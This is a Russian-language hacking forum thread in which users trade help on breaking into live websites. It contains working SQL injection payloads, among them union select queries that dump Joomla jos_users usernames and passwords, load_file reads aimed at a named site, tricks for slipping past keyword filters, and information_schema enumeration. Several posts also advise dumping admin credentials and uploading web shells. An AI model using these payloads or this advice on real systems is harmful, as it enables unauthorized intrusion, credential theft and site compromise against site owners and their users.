а чем ssl Может мешать твоей скуле? ошибки отключены значит error based не катит, пробуй стандартный метод union select, Или посимвольно
посоны, нид хелп. наглухо фильтруется union, select, from. любое наличие одного из операторов приводит к редиректу, урл кодирование не помогло, нормализации нет (uni/**/on), POST фильтруется. хз что можно ещё придумать, но придумать нужно кровь из носа.
Обычно, когда я натыкаюсь на всякие редиректы, а также отданные сервером странички типа "Not Acceptable" и "Method Not Implemented" балуюсь с материалами из этой методички. Ну и нужно помнить про /*!sql-code*/ и /*!12345sql-code*/ Возможно, поможет.
Ну, я же не телепат и не могу знать, что конкретно вы использовали. Просто привел справочный материал, в котором довольно полно собраны все, как вы выразились, тривиальные методы. Ведь вполне возможно, вы что-то могли и упустить. В любом случае, я всего лишь хотел помочь. Удачи в вашем мозговом штурме.
Пациент: Fiile_priv Y + доступ к PhpInfo. Пробовал залить мини-шелл след образом: Выдает ошибку: ЧТо можно с ним сделать? P.S Если у кого-то есть время, то напишите плиз в ЛС, чтобы разобрать этот пример. P.S1 эх, первый шелл был так близок =((...
Видимо вообще нету никуда прав на запись. Ищи админки от сайта/поддоменов, ищи пути до корней этих поддоменов, ищи настройки подключения к бд и таблицы с полями для авторизации, дампь лог/пас, заходи в админку и лей шел.
skier529, у тебя там фряха стоит, поэтому можешь читать содержимое папки, а не только файла, потому пробуй админку посмотреть ну и тд и тп... Пример: Code: http://www.aviel[antigoogle]ru/txt/new.php?id=32270-9.999+union+select+1,load_file('/usr/local/www/aviel/www')3,4,5,6,7,8,9,10,11+from+mysql.user+--+
Есть инклуд, есть ава, есть ошибка, по которой виден путь. Но ава почему-то не инклудится, хотя другие картинки инклудятся. Все вроде на 1-м сервере. Это Mod rewrite шалит? Как понять что за фигня?
мод реврайт не действует для инклудов ну вот наверное не на 1 сервере, или что то не правильно делаешь, чтобы наверняка найди настройки апача и посмотри есть ли там такой хост если сам не можешь, выложи, что гадать то, мож и поможет кто
Раскручиваю sql- иньекцию. Наугад нашел таблицу games. Запрос вида: работает. Запрос типа: не работает. Хотя таблицу games в БД я найти не могу. А таблицу jos_users - могу найти. но вывести данные не получается. - срабатывает. Подозреваю на фильтрацию или некорректную кодировку в базе данных. Вопрос, как можно будет зафильтровать jos_users, чтобы можно было делать запросы и выводить данные из логина-паролей типа: PHP: game.php?gameid=-1+union+select+1,concat_ws(0x03a,id,username,password),3,4,5,6,7,8+FROM+jos_users--
to Muracha PHP: game.php?gameid=-1+union+select+1,concat_ws(0x03a,id,username,password),3,4,5,6,7,8+FROM+anotherdb.jos_users-- Для вывода таблиц из другой базы данных PHP: select table_name from information_schema.tables where table_schema='anotherdb' limit 0,1; Так же делаем с колонками PHP: select column_name from information_schema.columns where table_name='jos_users' and table_schema='anotherdb' limit 0,1;
Не знаю туда или нет, но все-таки спрошу: Есть доступ к админке, там есть возможность заливки pdf файла. В итоге файл получает ссылку вида http://shell.com/download.php?id=418. В БД никаких упоминай о файле... По крайней мере в данных к которым у меня есть доступ. Вопрос в том как этот файл запустить. P.S По этой ссылке выдает ошибку "Не удалось загрузить документ PDF.